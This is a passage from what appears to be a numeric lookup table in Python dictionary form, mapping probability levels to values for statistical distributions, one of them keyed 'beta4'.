0.7372700811799572, 0.505: 0.7376993330148248, 0.506: 0.7381282884289455, 0.507: 0.7385569495579267, 0.508: 0.7389853185313442, 0.509: 0.7394133974728119, 0.51: 0.7398411885000629, 0.511: 0.7402686937250471, 0.512: 0.7406959152540055, 0.513: 0.741122855187553, 0.514: 0.7415495156207655, 0.515: 0.7419758986432556, 0.516: 0.7424020063392585, 0.517: 0.7428278407877171, 0.518: 0.7432534040623593, 0.519: 0.7436786982317708, 0.52: 0.7441037253594894, 0.521: 0.7445284875040802, 0.522: 0.7449529867192101, 0.523: 0.7453772250537332, 0.524: 0.745801204551769, 0.525: 0.7462249272527776, 0.526: 0.7466483951916411, 0.527: 0.7470716103987431, 0.528: 0.7474945749000428, 0.529: 0.74791729071716, 0.53: 0.748339759867439, 0.531: 0.7487619843640451, 0.532: 0.7491839662160209, 0.533: 0.7500272100021748, 0.534: 0.7504484759345688, 0.535: 0.750869507218928, 0.536: 0.7512903058448795, 0.537: 0.7517108737983949, 
0.538: 0.7521312130618715, 0.539: 0.7525513256141956, 0.54: 0.7529712134308282, 0.541: 0.7533908784838732, 0.542: 0.7538103227421544, 0.543: 0.754229548171289, 0.544: 0.7546485567337676, 0.545: 0.7550673503890208, 0.546: 0.7554859310934963, 0.547: 0.7559043008007363, 0.548: 0.7563224614614448, 0.549: 0.7567404150235721, 0.55: 0.7571581634323776, 0.551: 0.7575757086305109, 0.552: 0.7579930525580765, 0.553: 0.7584101971527252, 0.554: 0.7588271443497, 0.555: 0.7592438960819415, 0.556: 0.7596604542801327, 0.557: 0.7600768208727952, 0.558: 0.7604929977863476, 0.559: 0.7609089869451785, 0.56: 0.7613247902717337, 0.561: 0.7617404096865756, 0.562: 0.7621558471084606, 0.563: 0.7621558471084606, 0.564: 0.7625711044544199, 0.565: 0.7629861836398162, 0.566: 0.7634010865784351, 0.567: 0.7638158151825467, 0.568: 0.7642303713629843, 0.569: 0.7646447570292122, 0.57: 0.7650589740894096, 0.571: 0.7654730244505318, 0.572: 0.7658869100183937, 0.573: 0.7663006326977352, 0.574: 0.7667141943923046, 0.575: 0.7671275970049194, 0.576: 0.767540842437554, 0.577: 0.7679539325914064, 0.578: 0.7683668693669741, 0.579: 0.7687796546641252, 0.58: 0.7691922903821782, 0.581: 0.7696047784199711, 0.582: 0.7700171206759436, 0.583: 0.7704293190482026, 0.584: 0.7708413754346044, 0.585: 0.7712532917328274, 0.586: 0.7716650698404466, 0.587: 0.7720767116550123, 0.588: 0.7724882190741225, 0.589: 0.7728995939955002, 0.59: 0.773310838317069, 0.591: 0.773721953937033, 0.592: 0.7741329427539492, 0.593: 0.7745438066668062, 0.594: 0.7749545475750999, 0.595: 0.775365167378917, 0.596: 0.7757756679790029, 0.597: 0.7761860512768476, 0.598: 0.7765963191747626, 0.599: 0.7770064735759555, 0.6: 0.7774165163846163, 0.601: 0.7778264495059879, 0.602: 0.7782362748464531, 0.603: 0.7786459943136105, 0.604: 0.7790556098163555, 0.605: 0.7794651232649613, 0.606: 0.7798745365711616, 0.607: 0.7802838516482298, 0.608: 0.7806930704110627, 0.609: 0.7811021947762602, 0.61: 0.7815112266622087, 0.611: 0.7819201679891684, 0.612: 
0.7823290206793507, 0.613: 0.7827377866570054, 0.614: 0.7831464678485047, 0.615: 0.7835550661824275, 0.616: 0.7839635835896478, 0.617: 0.7843720220034165, 0.618: 0.7847803833594487, 0.619: 0.7851886695960131, 0.62: 0.7855968826540182, 0.621: 0.786005024477099, 0.622: 0.786413097011708, 0.623: 0.7868211022072011, 0.624: 0.7872290420159306, 0.625: 0.7876369183933362, 0.626: 0.7880447332980294, 0.627: 0.7884524886918934, 0.628: 0.7888601865401708, 0.629: 0.7892678288115562, 0.63: 0.7896754174782934, 0.631: 0.7900829545162642, 0.632: 0.7904904419050889, 0.633: 0.7908978816282177, 0.634: 0.791305275673029, 0.635: 0.7917126260309262, 0.636: 0.7921199346974361, 0.637: 0.7925272036723071, 0.638: 0.7929344349596062, 0.639: 0.7933416305678247, 0.64: 0.7937487925099744, 0.641: 0.7941559228036911, 0.642: 0.7945630234713377, 0.643: 0.794970096540108, 0.644: 0.7953771440421287, 0.645: 0.79578416801457, 0.646: 0.796191170499746, 0.647: 0.7965981535452262, 0.648: 0.7970051192039411, 0.649: 0.7974120695342927, 0.65: 0.7978190066002653, 0.651: 0.7982259324715344, 0.652: 0.7986328492235822, 0.653: 0.7990397589378074, 0.654: 0.7994466637016426, 0.655: 0.7998535656086684, 0.656: 0.8002604667587291, 0.657: 0.8006673692580524, 0.658: 0.8014811867620207, 0.659: 0.8018881060121092, 0.66: 0.8022950351025896, 0.661: 0.8027019761734091, 0.662: 0.8031089313716283, 0.663: 0.803515902851549, 0.664: 0.803922892774841, 0.665: 0.8043299033106696, 0.666: 0.8047369366358303, 0.667: 0.805143994934877, 0.668: 0.805551080400256, 0.669: 0.80595819523244, 0.67: 0.8063653416400667, 0.671: 0.8067725218400744, 0.672: 0.8071797380578409, 0.673: 0.807586992527326, 0.674: 0.8079942874912138, 0.675: 0.8084016252010561, 0.676: 0.8088090079174157, 0.677: 0.8092164379100194, 0.678: 0.8096239174579022, 0.679: 0.8100314488495599, 0.68: 0.8104390343831015, 0.681: 0.8108466763664051, 0.682: 0.8112543771172726, 0.683: 0.8116621389635872, 0.684: 0.8120699642434749, 0.685: 0.8124778553054687, 0.686: 0.812885814508668, 
0.687: 0.8132938442229097, 0.688: 0.8132938442229097, 0.689: 0.8137019468289306, 0.69: 0.8141101247185454, 0.691: 0.8145183802948126, 0.692: 0.8149267159722117, 0.693: 0.8153351341768218, 0.694: 0.8157436373464985, 0.695: 0.8161522279310555, 0.696: 0.8165609083924505, 0.697: 0.8169696812049714, 0.698: 0.8173785488554234, 0.699: 0.817787513843319, 0.7: 0.8181965786810788, 0.701: 0.81860574589422, 0.702: 0.8190150180215611, 0.703: 0.8194243976154219, 0.704: 0.8198338872418283, 0.705: 0.8202434894807192, 0.706: 0.8206532069261581, 0.707: 0.8210630421865471, 0.708: 0.8214729978848386, 0.709: 0.8218830766587641, 0.71: 0.8222932811610467, 0.711: 0.8227036140596329, 0.712: 0.8231140780379193, 0.713: 0.8235246757949855, 0.714: 0.8239354100458285, 0.715: 0.8243462835216071, 0.716: 0.8247572989698749, 0.717: 0.8251684591548364, 0.718: 0.8255797668575894, 0.719: 0.8259912248763827, 0.72: 0.8264028360268721, 0.721: 0.82681460314238, 0.722: 0.8272265290741677, 0.723: 0.8276386166916927, 0.724: 0.8280508688828925, 0.725: 0.8284632885544565, 0.726: 0.8288758786321117, 0.727: 0.829288642060904, 0.728: 0.829701581805491, 0.729: 0.8301147008504408, 0.73: 0.8305280022005292, 0.731: 0.8309414888810429, 0.732: 0.8313551639380885, 0.733: 0.8317690304389093, 0.734: 0.832183091472205, 0.735: 0.8325973501484578, 0.736: 0.8330118096002533, 0.737: 0.8334264729826311, 0.738: 0.8338413434734111, 0.739: 0.8342564242735487, 0.74: 0.8346717186074828, 0.741: 0.8350872297234988, 0.742: 0.835502960894084, 0.743: 0.8359189154163078, 0.744: 0.836335096612192, 0.745: 0.8367515078290969, 0.746: 0.8371681524401079, 0.747: 0.8375850338444296, 0.748: 0.8380021554677974, 0.749: 0.8384195207628786, 0.75: 0.8388371332096949, 0.751: 0.839254996316041, 0.752: 0.8396731136179256, 0.753: 0.84009148868, 0.754: 0.8405101250960147, 0.755: 0.8409290264892669, 0.756: 0.8413481965130679, 0.757: 0.8417676388512205, 0.758: 0.8421873572184837, 0.759: 0.8426073553610762, 0.76: 0.8430276370571695, 0.761: 0.8434482061173915, 
0.762: 0.8438690663853534, 0.763: 0.8442902217381587, 0.764: 0.844711676086954, 0.765: 0.8451334333774695, 0.766: 0.8455554975905712, 0.767: 0.8464005628871285, 0.768: 0.8468235721131693, 0.769: 0.8472469045481636, 0.77: 0.8476705643574003, 0.771: 0.8480945557448651, 0.772: 0.8485188829538903, 0.773: 0.8489435502677997, 0.774: 0.8493685620105581, 0.775: 0.8497939225474583, 0.776: 0.8502196362858021, 0.777: 0.8506457076755949, 0.778: 0.851072141210278, 0.779: 0.8514989414274313, 0.78: 0.8519261129095379, 0.781: 0.8523536602847411, 0.782: 0.852781588227601, 0.783: 0.853209901459908, 0.784: 0.8536386047514757, 0.785: 0.854067702920964, 0.786: 0.8544972008367249, 0.787: 0.8549271034176584, 0.788: 0.8553574156340878, 0.789: 0.8557881425086524, 0.79: 0.8562192891172231, 0.791: 0.8566508605898439, 0.792: 0.8570828621116668, 0.793: 0.857515298923939, 0.794: 0.8579481763250044, 0.795: 0.8583814996712956, 0.796: 0.858815274378404, 0.797: 0.8592495059221108, 0.798: 0.8596841998395001, 0.799: 0.8601193617300558, 0.8: 0.8605549972567834, 0.801: 0.860991112147404, 0.802: 0.8614277121955056, 0.803: 0.8618648032617768, 0.804: 0.862302391275245, 0.805: 0.8627404822345398, 0.806: 0.8631790822091976, 0.807: 0.8636181973409898, 0.808: 0.8640578338452893, 0.809: 0.8644979980124431, 0.81: 0.8649386962092287, 0.811: 0.8653799348802875, 0.812: 0.8658217205496228, 0.813: 0.8658217205496228, 0.814: 0.8662640598221462, 0.815: 0.8667069593852249, 0.816: 0.8671504260102983, 0.817: 0.8675944665545221, 0.818: 0.8680390879624442, 0.819: 0.868484297267744, 0.82: 0.8689301015949923, 0.821: 0.8693765081614677, 0.822: 0.8698235242790151, 0.823: 0.8702711573559507, 0.824: 0.8707194148990185, 0.825: 0.8711683045153991, 0.826: 0.8716178339147624, 0.827: 0.8720680109113631, 0.828: 0.8725188434262364, 0.829: 0.8729703394893837, 0.83: 0.8734225072420762, 0.831: 0.8738753549391953, 0.832: 0.8743288909516078, 0.833: 0.8747831237686716, 0.834: 0.8752380620007343, 0.835: 0.8756937143817536, 0.836: 
0.8761500897719717, 0.837: 0.8766071971606508, 0.838: 0.8770650456689086, 0.839: 0.8775236445525976, 0.84: 0.8779830032053098, 0.841: 0.8784431311614472, 0.842: 0.87890403809934, 0.843: 0.8793657338445258, 0.844: 0.8798282283730703, 0.845: 0.8802915318150021, 0.846: 0.8807556544578454, 0.847: 0.8812206067502519, 0.848: 0.8816863993057594, 0.849: 0.8821530429066325, 0.85: 0.8826205485078215, 0.851: 0.8830889272410779, 0.852: 0.8835581904191525, 0.853: 0.8840283495401449, 0.854: 0.8844994162919538, 0.855: 0.8849714025569239, 0.856: 0.8854443204165868, 0.857: 0.885918182156552, 0.858: 0.8863930002715902, 0.859: 0.8868687874708521, 0.86: 0.8873455566832378, 0.861: 0.8878233210629703, 0.862: 0.8883020939953478, 0.863: 0.8887818891026656, 0.864: 0.8892627202503346, 0.865: 0.889744601553215, 0.866: 0.8902275473821786, 0.867: 0.8907115723708232, 0.868: 0.89119669142251, 0.869: 0.8916829197175793, 0.87: 0.8921702727208111, 0.871: 0.8926587661891863, 0.872: 0.8931484161798863, 0.873: 0.8936392390585964, 0.874: 0.894131251508071, 0.875: 0.8946244705370525, 0.876: 0.8951189134894744, 0.877: 0.895614598054019, 0.878: 0.8961115422740262, 0.879: 0.8966097645577332, 0.88: 0.8971092836889663, 0.881: 0.8976101188381802, 0.882: 0.8981122895739193, 0.883: 0.8986158158747501, 0.884: 0.8996270172107048, 0.885: 0.9001347343668029, 0.886: 0.9006438913571762, 0.887: 0.9011545104060396, 0.888: 0.9016666142295524, 0.889: 0.9021802260514752, 0.89: 0.9026953696194422, 0.891: 0.9032120692219234, 0.892: 0.9037303497058868, 0.893: 0.9042502364952025, 0.894: 0.9047717556098503, 0.895: 0.9052949336859292, 0.896: 0.9058197979965497, 0.897: 0.9063463764736668, 0.898: 0.9068746977307942, 0.899: 0.907404791086872, 0.9: 0.9079366865910729, 0.901: 0.9084704150488361, 0.902: 0.9090060080490603, 0.903: 0.9095434979925788, 0.904: 0.910082918121967, 0.905: 0.910624302552747, 0.906: 0.9111676863061664, 0.907: 0.9117131053434584, 0.908: 0.9122605966018961, 0.909: 0.9128101980325561, 0.91: 0.9133619486400298, 
0.911: 0.9139158885240886, 0.912: 0.9144720589236099, 0.913: 0.915030502262612, 0.914: 0.9155912621989051, 0.915: 0.9161543836751155, 0.916: 0.916719912972671, 0.917: 0.9172878977685587, 0.918: 0.9178583871953134, 0.919: 0.9184314319042856, 0.92: 0.91900708413253, 0.921: 0.9195853977735284, 0.922: 0.9201664284519813, 0.923: 0.920750233602964, 0.924: 0.921336872555888, 0.925: 0.9219264066234327, 0.926: 0.9225188991959647, 0.927: 0.9231144158417716, 0.928: 0.9237130244135927, 0.929: 0.9243147951619725, 0.93: 0.9249198008559241, 0.931: 0.9255281169114625, 0.932: 0.9261398215287105, 0.933: 0.9267549958382909, 0.934: 0.9273737240577397, 0.935: 0.92799609365872, 0.936: 0.928622195546219, 0.937: 0.9292521242504579, 0.938: 0.9292521242504579, 0.939: 0.9298859781328668, 0.94: 0.9305238596073836, 0.941: 0.931165875378347, 0.942: 0.9318121366967276, 0.943: 0.9324627596362657, 0.944: 0.9331178653916035, 0.945: 0.933777580600472, 0.946: 0.9344420376924215, 0.947: 0.9351113752667268, 0.948: 0.9357857385026679, 0.949: 0.9364652796054211, 0.95: 0.937150158291647, 0.951: 0.9378405423189374, 0.952: 0.9385366080642967, 0.953: 0.9392385411571911, 0.954: 0.9399465371734812, 0.955: 0.9406608023978891, 0.956: 0.9413815546631431, 0.957: 0.9421090242753994, 0.958: 0.9428434550374909, 0.959: 0.9435851053822989, 0.96: 0.9443342496316968, 0.961: 0.9450911793978888, 0.962: 0.945856205148016, 0.963: 0.9466296579552712, 0.964: 0.9474118914646792, 0.965: 0.9482032841068802, 0.966: 0.9490042415986161, 0.967: 0.9498151997772327, 0.968: 0.9506366278252294, 0.969: 0.9514690319520888, 0.97: 0.9523129596160298, 0.971: 0.9531690043849087, 0.972: 0.9540378115592142, 0.973: 0.9549200847079529, 0.974: 0.9558165933058685, 0.975: 0.9567281817072483, 0.976: 0.9576557797538003, 0.977: 0.9586004153958916, 0.978: 0.9595632298144803, 0.979: 0.9605454956773251, 0.98: 0.961548639362179, 0.981: 0.9625742682534052, 0.982: 0.9636242046045878, 0.983: 0.9647005280060533, 0.984: 0.9658056292907885, 0.985: 
0.9669422798859362, 0.986: 0.9681137223883007, 0.987: 0.969323790886672, 0.988: 0.9705770739195563, 0.989: 0.9718791401261718, 0.99: 0.9732368588572403, 0.991: 0.9746588696894386, 0.992: 0.9761562952386755, 0.993: 0.9777438717615068, 0.994: 0.9794418425593265, 0.995: 0.9812793568951739, 0.996: 0.9833011613491072, 0.997: 0.9855825957791874, 0.998: 0.9882705907872608, 0.999: 0.9917445572122447}, 'beta4': {0.001: 0.00019998005804071128, 0.002: 0.0004002204045574647, 0.003: 0.0006006213287669104, 0.004: 0.0008011831206943514, 0.005: 0.0010019060711810082, 0.006: 0.0012027904718907045, 0.007: 0.0014038366153058955, 0.008: 0.001605044794729051, 0.009: 0.0018064153042957605, 0.01: 0.002007948438980501, 0.011: 0.0022096444945776577, 0.012: 0.002411503767724943, 0.013: 0.0026135265559143867, 0.014: 0.0028157131574584517, 0.015: 0.003018063871538153, 0.016: 0.003220578998168856, 0.017: 0.0034232588382341047, 0.018: 0.0036261036934598237, 0.019: 0.0038291138664526846, 0.02: 0.00403228966066378, 0.021: 0.0042356313804248705, 0.022: 0.004439139330928271, 0.023: 0.004642813818244524, 0.024: 0.004846655149330454, 0.025: 0.0050506636320080825, 0.026: 0.005254839574995085, 0.027: 0.005459183287890954, 0.028: 0.005663695081191499, 0.029: 0.005868375266289406, 0.03: 0.006073224155463766, 0.031: 0.006278242061907052, 0.032: 0.0064834292997097125, 0.033: 0.00668878618387534, 0.034: 0.006894313030321713, 0.035: 0.007100010155878011, 0.036: 0.007305877878297563, 0.037: 0.007511916516250114, 0.038: 0.007718126389340973, 0.039: 0.007924507818096463, 0.04: 0.008131061123992048, 0.041: 0.008337786629420182, 0.042: 0.008544684657735183, 0.043: 0.008751755533227578, 0.044: 0.008958999581128573, 0.045: 0.009166417127646475, 0.046: 0.009374008499919767, 0.047: 0.009581774026066928, 0.048: 0.009789714035155795, 0.049: 0.009997828857236844, 0.05: 0.010206118823319751, 0.051: 0.010414584265399651, 0.052: 0.010623225516449099, 0.053: 0.010832042910421927, 0.054: 0.01104103678226016, 0.055: 
0.011250207467897311, 0.056: 0.01145955530427429, 0.057: 0.011669080629309344, 0.058: 0.011878783781943972, 0.059: 0.012088665102121407, 0.06: 0.012298724930791, 0.061: 0.012508963609927542, 0.062: 0.012719381482517458, 0.063: 0.012929978892580032, 0.064: 0.013140756185157917, 0.065: 0.01335171370632152, 0.066: 0.013562851803192999, 0.067: 0.013774170823917384, 0.068: 0.013985671117698075, 0.069: 0.014197353034783821, 0.07: 0.014409216926473003, 0.071: 0.014621263145133328, 0.072: 0.01483349204417878, 0.073: 0.015045903978106762, 0.074: 0.015258499302476039, 0.075: 0.015471278373926986, 0.076: 0.01568424155017064, 0.077: 0.015897389190005436, 0.078: 0.01611072165333038, 0.079: 0.016324239301124484, 0.08: 0.01653794249546798, 0.081: 0.016751831599545276, 0.082: 0.016965906977645433, 0.083: 0.017180168995179712, 0.084: 0.017394618018656167, 0.085: 0.01760925441572233, 0.086: 0.017824078555136243, 0.087: 0.018039090806796672, 0.088: 0.018254291541735704, 0.089: 0.018469681132123033, 0.09: 0.018685259951271547, 0.091: 0.018901028373641923, 0.092: 0.019116986774852813, 0.093: 0.0193331355316856, 0.094: 0.019549475022072865, 0.095: 0.019766005625124154, 0.096: 0.01998272772112894, 0.097: 0.020199641691539552, 0.098: 0.020416747919000798, 0.099: 0.020634046787345282, 0.1: 0.020851538681598076, 0.101: 0.02106922398798212, 0.102: 0.021287103093923336, 0.103: 0.021505176388065678, 0.104: 0.021723444260250448, 0.105: 0.021941907101542327, 0.106: 0.02216056530424554, 0.107: 0.022379419261869652, 0.108: 0.022598469369177705, 0.109: 0.02281771602215995, 0.11: 0.023037159618063352, 0.111: 0.02325680055536784, 0.112: 0.023476639233836444, 0.113: 0.023696676054460984, 0.114: 0.023916911419520945, 0.115: 0.024137345732567095, 0.116: 0.024357979398413047, 0.117: 0.024578812823170336, 0.118: 0.024799846414236285, 0.119: 0.0250210805802904, 0.12: 0.025242515731326447, 0.121: 0.0254641522786387, 0.122: 0.02568599063482206, 0.123: 0.025908031213808094, 0.124: 0.026130274430829985, 0.125: 
0.02635272070246037, 0.126: 0.02657537044660458, 0.127: 0.026798224082502403, 0.128: 0.027021282030743367, 0.129: 0.027244544713269807, 0.13: 0.02746801255337056, 0.131: 0.027691685975712928, 0.132: 0.027915565406323926, 0.133: 0.028139651272603407, 0.134: 0.028363944003336493, 0.135: 0.028588444028694697, 0.136: 0.028813151780242848, 0.137: 0.029038067690943345, 0.138: 0.029263192195163414, 0.139: 0.02948852572869147, 0.14: 0.029714068728718238, 0.141: 0.02993982163386695, 0.142: 0.030165784884191738, 0.143: 0.03039195892118548, 0.144: 0.03061834418777528, 0.145: 0.03084494112834553, 0.146: 0.031071750188734898, 0.147: 0.03129877181624225, 0.148: 0.031526006459636755, 0.149: 0.03175345456917217, 0.15: 0.0319811165965629, 0.151: 0.032208992995031674, 0.152: 0.03243708421929227, 0.153: 0.03266539072555246, 0.154: 0.0328939129715389, 0.155: 0.03312265141649033, 0.156: 0.033351606521157984, 0.157: 0.03358077874784467, 0.158: 0.033810168560369044, 0.159: 0.0340397764240995, 0.16: 0.034269602805954924, 0.161: 0.03449964817442163, 0.162: 0.03472991299952519, 0.163: 0.034960397752885806, 0.164: 0.035191102907694734, 0.165: 0.0354220289387298, 0.166: 0.035653176322351626, 0.167: 0.03588454553653539, 0.168: 0.036116137060853704, 0.169: 0.036347951376499765, 0.17: 0.036579988966282576, 0.171: 0.03681225031465444, 0.172: 0.037044735907685276, 0.173: 0.03727744623310381, 0.174: 0.03751038178028295, 0.175: 0.03774354304026518, 0.176: 0.0379769305057472, 0.177: 0.038210544671111485, 0.178: 0.03844438603241455, 0.179: 0.038678455087416734, 0.18: 0.03891275233556041, 0.181: 0.03914727827800287, 0.182: 0.03938203341761945, 0.183: 0.03961701825899733, 0.184: 0.039852233308465296, 0.185: 0.04008767907407873, 0.186: 0.040323356065650816, 0.187: 0.04055926479473852, 0.188: 0.040795405774665665, 0.189: 0.041031779520537034, 0.19: 0.04126838654921838, 0.191: 0.041505227379378486, 0.192: 0.041742302531467566, 0.193: 0.04197961252775981, 0.194: 0.04221715789232681, 0.195: 
0.042454939151061806, 0.196: 0.04269295683169627, 0.197: 0.042931211463792876, 0.198: 0.043169703578770334, 0.199: 0.04340843370990257, 0.2: 0.04364740239231127, 0.201: 0.04388661016301945, 0.202: 0.044126057560915144, 0.203: 0.044365745126777316, 0.204: 0.04460567340329231, 0.205: 0.04484584293505811, 0.206: 0.04508625426858496, 0.207: 0.04532690795231201, 0.208: 0.04556780453662512, 0.209: 0.0458089445738521, 0.21: 0.04605032861826507, 0.211: 0.04629195722611862, 0.212: 0.04653383095563195, 0.213: 0.046775950367015554, 0.214: 0.04701831602246576, 0.215: 0.047260928486195036, 0.216: 0.047503788324414306, 0.217: 0.047746896105369814, 0.218: 0.04799025239934135, 0.219: 0.04823385777863669, 0.22: 0.04847771281762821, 0.221: 0.04872181809275573, 0.222: 0.0489661741825225, 0.223: 0.049210781667516384, 0.224: 0.049455641130425124, 0.225: 0.049700753156030404, 0.226: 0.04994611833123204, 0.227: 0.05019173724506154, 0.228: 0.05043761048866911, 0.229: 0.05068373865537025, 0.23: 0.0509301223406147, 0.231: 0.051176762142036605, 0.232: 0.051423658659436294, 0.233: 0.05167081249480347, 0.234: 0.05191822425233639, 0.235: 0.05216589453842663, 0.236: 0.05241382396170518, 0.237: 0.05266201313301463, 0.238: 0.052910462665459124, 0.239: 0.05315917317438074, 0.24: 0.05340814527739983, 0.241: 0.05365737959440284, 0.242: 0.0539068767475747, 0.243: 0.05415663736139265, 0.244: 0.05440666206264523, 0.245: 0.054656951480446636, 0.246: 0.05490750624623935, 0.247: 0.05515832699382815, 0.248: 0.05540941435935247, 0.249: 0.05566076898134175, 0.25: 0.055912391500690835, 0.251: 0.056164282560705575, 0.252: 0.056416442807086076, 0.253: 0.05666887288794967, 0.254: 0.056921573453853076, 0.255: 0.05717454515779148, 0.256: 0.05742778865521043, 0.257: 0.05768130460403543, 0.258: 0.05793509366466473, 0.259: 0.05818915649999461, 0.26: 0.05844349377541235, 0.261: 0.05869810615884815, 0.262: 0.058952994320748325, 0.263: 0.05920815893411248, 0.264: 0.05946360067448175, 0.265: 0.05971932021999787, 0.266: 
0.059975318251359794, 0.267: 0.060231595451876695, 0.268: 0.06048815250747665, 0.269: 0.060744990106690246, 0.27: 0.061002108940712695, 0.271: 0.061259509703376555, 0.272: 0.061517193091183864, 0.273: 0.06177515980332206, 0.274: 0.0620334105416575, 0.275: 0.06229194601078976, 0.276: 0.06255076691801634, 0.277: 0.06280987397338685, 0.278: 0.0630692678896992, 0.279: 0.06332894938251532, 0.28: 0.0635889191701748, 0.281: 0.06384917797382073, 0.282: 0.06410972651739967, 0.283: 0.06437056552768416, 0.284: 0.06463169573428154, 0.285: 0.06489311786967034, 0.286: 0.06515483266918098, 0.287: 0.06541684087103565, 0.288: 0.06567914321635825, 0.289: 0.06594174044918945, 0.29: 0.06620463331649956, 0.291: 0.0664678225682073, 0.292: 0.06673130895719456, 0.293: 0.06699509323932473, 0.294: 0.06725917617345606, 0.295: 0.06752355852145142, 0.296: 0.06778824104820663, 0.297: 0.06805322452166121, 0.298: 0.06831850971281445, 0.299: 0.06858409739574531, 0.3: 0.0688499883476261, 0.301: 0.06911618334873397, 0.302: 0.06938268318247667, 0.303: 0.06964948863540682, 0.304: 0.06991660049723834, 0.305: 0.07018401956087042, 0.306: 0.07045174662238612, 0.307: 0.0707197824810849, 0.308: 0.07098812793950916, 0.309: 0.07125678380343634, 0.31: 0.07152575088192321, 0.311: 0.0717950299872978, 0.312: 0.07206462193520236, 0.313: 0.07233452754459807, 0.314: 0.07260474763778418, 0.315: 0.07287528304041406, 0.316: 0.07314613458153059, 0.317: 0.07341730309355458, 0.318: 0.07368878941234251, 0.319: 0.0739605943771658, 0.32: 0.07423271883076066, 0.321: 0.07450516361932857, 0.322: 0.07477792959256262, 0.323: 0.07505101760367115, 0.324: 0.07532442850939472, 0.325: 0.07559816317001775, 0.326: 0.07587222244939851, 0.327: 0.07614660721498685, 0.328: 0.07642131833784976, 0.329: 0.07669635669267517, 0.33: 0.07697172315780416, 0.331: 0.07724741861525855, 0.332: 0.07752344395075124, 0.333: 0.07779980005369812, 0.334: 0.07807648781727695, 0.335: 0.07835350813839569, 0.336: 0.07863086191775942, 0.337: 0.07890855005986012, 
0.338: 0.07918657347301983, 0.339: 0.07946493306940684, 0.34: 0.07974362976505, 0.341: 0.08002266447986961, 0.342: 0.08030203813769611, 0.343: 0.08058175166629386, 0.344: 0.0808618059973792, 0.345: 0.08114220206666058, 0.346: 0.08142294081384127, 0.347: 0.08170402318263831, 0.348: 0.08198545012083736, 0.349: 0.08226722258028256, 0.35: 0.08254934151692636, 0.351: 0.08283180789082699, 0.352: 0.08311462266620714, 0.353: 0.08339778681143724, 0.354: 0.08368130129909428, 0.355: 0.08396516710597787, 0.356: 0.08424938521310864, 0.357: 0.08453395660580112, 0.358: 0.08481888227364158, 0.359: 0.08510416321055453, 0.36: 0.08538980041478683, 0.361: 0.08567579488898139, 0.362: 0.08596214764016047, 0.363: 0.08624885967976403, 0.364: 0.0865359320236927, 0.365: 0.08682336569231888, 0.366: 0.08711116171051607, 0.367: 0.08739932110768468, 0.368: 0.08768784491778941, 0.369: 0.08797673417936844, 0.37: 0.0882659899355753, 0.371: 0.08855561323420916, 0.372: 0.0888456051277254, 0.373: 0.08913596667328731, 0.374: 0.08942669893276224, 0.375: 0.089717802972796, 0.376: 0.09000927986480035, 0.377: 0.09030113068499687, 0.378: 0.09059335651445141, 0.379: 0.09088595843909883, 0.38: 0.09117893754977441, 0.381: 0.09147229494223763, 0.382: 0.09176603171722476, 0.383: 0.09206014898043888, 0.384: 0.09235464784261732, 0.385: 0.09264952941954734, 0.386: 0.09294479483209815, 0.387: 0.09324044520626536, 0.388: 0.09353648167316578, 0.389: 0.09383290536911687, 0.39: 0.09412971743564406, 0.391: 0.0944269190195053, 0.392: 0.09472451127274187, 0.393: 0.09502249535270467, 0.394: 0.09532087242208949, 0.395: 0.09561964364895584, 0.396: 0.09591881020677938, 0.397: 0.09621837327448969, 0.398: 0.09651833403647817, 0.399: 0.09681869368265199, 0.4: 0.09711945340848228, 0.401: 0.09742061441499439, 0.402: 0.09772217790885732, 0.403: 0.09802414510238132, 0.404: 0.0983265172135625, 0.405: 0.09862929546613368, 0.406: 0.09893248108958946, 0.407: 0.09923607531921358, 0.408: 0.09954007939613327, 0.409: 0.09984449456734855, 
0.41: 0.10014932208577966, 0.411: 0.1004545632102829, 0.412: 0.10076021920570839, 0.413: 0.10106629134293674, 0.414: 0.10137278089891696, 0.415: 0.10167968915669329, 0.416: 0.10198701740546645, 0.417: 0.10229476694061598, 0.418: 0.10260293906374693, 0.419: 0.10291153508273282, 0.42: 0.10322055631175478, 0.421: 0.10353000407133751, 0.422: 0.1038398796884129, 0.423: 0.10415018449632063, 0.424: 0.1044609198348933, 0.425: 0.10477208705047297, 0.426: 0.10508368749596653, 0.427: 0.10539572253088365, 0.428: 0.10570819352137661, 0.429: 0.10602110184029956, 0.43: 0.1063344488672443, 0.431: 0.10664823598856697, 0.432: 0.10696246459746714, 0.433: 0.10727713609401288, 0.434: 0.10759225188519075, 0.435: 0.10790781338494819, 0.436: 0.10822382201425752, 0.437: 0.10854027920113521, 0.438: 0.10885718638071207, 0.439: 0.10917454499527934, 0.44: 0.10949235649431968, 0.441: 0.10981062233457517, 0.442: 0.11012934398009516, 0.443: 0.11044852290226946, 0.444: 0.11076816057990178, 0.445: 0.11108825849923756, 0.446: 0.11140881815402805, 0.447: 0.11172984104559078, 0.448: 0.11205132868283442, 0.449: 0.11237328258233543, 0.45: 0.11269570426838246, 0.451: 0.11301859527303189, 0.452: 0.11334195713615819, 0.453: 0.11366579140549511, 0.454: 0.11399009963672858, 0.455: 0.1143148833935199, 0.456: 0.11464014424756157, 0.457: 0.11496588377864335, 0.458: 0.11529210357471631, 0.459: 0.11561880523193852, 0.46: 0.11594599035472929, 0.461: 0.1162736605558398, 0.462: 0.11660181745639499, 0.463: 0.11693046268597888, 0.464: 0.11725959788265967, 0.465: 0.11758922469309523, 0.466: 0.11791934477254173, 0.467: 0.1182499597849514, 0.468: 0.11858107140302623, 0.469: 0.11891268130827812, 0.47: 0.11924479119108941, 0.471: 0.11957740275078407, 0.472: 0.119910517695687, 0.473: 0.1202441377431809, 0.474: 0.12057826461978641, 0.475: 0.12091290006121841, 0.476: 0.12124804581247554, 0.477: 0.12158370362784898, 0.478: 0.12191987527107043, 0.479: 0.12225656251530974, 0.48: 0.12259376714328658, 0.481: 0.12293149094732167, 
